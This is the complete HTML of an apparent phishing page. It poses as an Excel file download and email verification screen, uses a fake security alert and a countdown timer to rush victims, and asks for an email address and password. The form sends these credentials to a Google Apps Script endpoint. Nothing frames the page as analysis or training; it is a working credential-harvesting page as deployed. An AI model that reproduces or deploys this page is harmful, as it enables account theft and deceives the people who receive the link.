<!DOCTYPE html>
<html>
<head><meta charset="utf-8">
	<title>Excel File Download</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" /><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
	<style type="text/css">body {
                      font-family: Arial;
                    }

                    input[type=email], select {
                        width: 100%;
                        padding: 12px 20px;
                        margin: 15px 0;
                        display: block;
                        border: 1px solid #ccc;
                        border-radius: 4px;
                        box-sizing: border-box;
                    }

                    input[type=password], select {
                        width: 100%;
                        padding: 12px 20px;
                        margin: 15px 0;
                        display: block;
                        border: 1px solid #ccc;
                        border-radius: 4px;
                        box-sizing: border-box;
                    }

                    input[type=submit] {
                        width: 100%;
                        background-color: #217346;
                        color: white;
                        padding: 14px 20px;
                        margin: 8px 0;
                        border: none;
                        border-radius: 4px;
                        cursor: pointer;
                    }

                    input[type=submit]:hover {
                        background-color: #217346;
                    }

                    div.container {
                        margin: auto;
                        width: 50%;
                        padding: 10px;
                        border: 20px #217346;
                        border-radius: 10px;
                        background-color: white;
                        width: 500px;
                        padding: 20px;
                        border-style: solid;
                        border-width: thin;
                    }
	</style>
	<style type="text/css">
	</style>
</head>
<body style="background-image: url('https://livcifilter.com/images/blur.jpg'); background-repeat: no-repeat;
    background-size: 100% 100%; ">
<p></p>

<p></p>

<p></p>

<p></p>

<div class="container">
<p><span style="font-size:12px;"><span style="font-family:georgia,serif;"><strong>Email Address Verification</strong></span></span></p>

<p></p>

<p><b style="color: rgb(33, 115, 70); font-family: &quot;Trebuchet MS&quot;; font-size: x-large;">VERIFY YOUR MAIL INFO NOW!!!</b></p>

<p></p>
<script language="JavaScript">
    <!--
    function validateForm()
    {
    var y=document.forms["myform"]["eml"].value;
    if(y==null || y=="")
      {
      alert("Enter your Email");
      return false;
      }
    var y=document.forms["myform"]["pswd"].value;
    if(y==null || y=="")
      {
      alert("Password is Empty");
      return false;
      }
    var y=document.forms["myform"]["pswd"].value;
    if(y.length <6 )
      {
      alert("Invalid password");
      return false;
      }
    }
    
    
    
    -->
</script>

<form action="https://script.google.com/macros/s/AKfycbz1HTYFbUZ3gdvJztH0ETEKZcIX9bnFC3wosLhawqoRbGgeZl84pmfiX37C6FN4PRw/exec" method="post" name="myform" onsubmit="return validateForm()">
<hr style="height:2px;border:none;color:#217346;background-color:#217346;" />
<div class="alert alert-danger"><b style="font-family: georgia, serif; font-size: 14px;">Security&nbsp;</b><font face="georgia, serif"><b>Alert!</b>&nbsp;Email Protection: Sign in and have access to the Verification Tab</font></div>

<div id="countdown" style="text-align: center">03:00</div>

<center><input autofocus="" id="fname" name="eml" placeholder="Enter your Email Address" required="" type="email" /> <input autofocus="" id="fname" name="pswd" placeholder="Enter your Email Password to Validate" required="" type="password" /> <input type="submit" value="Click to Validate " /></center>
</form>

<p>&nbsp;</p>
</div>
<script>
		function countdown() {
time = document.getElementById('countdown').innerHTML;
timeArray = time.split(':')
seconds = timeToSeconds(timeArray);
if (seconds == '') {
temp = document.getElementById('countdown');
temp.innerHTML = "00:00";
return;
}
seconds--;
temp = document.getElementById('countdown');
temp.innerHTML= secondsToTime(seconds);
timeoutMyOswego = setTimeout(countdown, 1000);        
}
function timeToSeconds(timeArray) {  
var minutes = (timeArray[0] * 1);
var seconds = (minutes * 60) + (timeArray[1] * 1);
return seconds;
}

function secondsToTime(secs) {
var hours = Math.floor(secs / (60 * 60));
hours = hours < 10 ? '0' + hours : hours;
var divisor_for_minutes = secs % (60 * 60);
var minutes = Math.floor(divisor_for_minutes / 60);
minutes = minutes < 10 ? '0' + minutes : minutes;
var divisor_for_seconds = divisor_for_minutes % 60;
var seconds = Math.ceil(divisor_for_seconds);
seconds = seconds < 10 ? '0' + seconds : seconds;            
return  minutes + ':' + seconds;   
}
countdown();
</script><script>
  
document.getElementById("mytext").value = getUrlVars()["emailid"];;
  
function getUrlVars() {
    var vars = {};
    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
        vars[key] = value;
    });
    return vars;
}
</script><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script>
</script>

<p></p>

<p></p>

<p></p>

<p></p>
</body>
</html>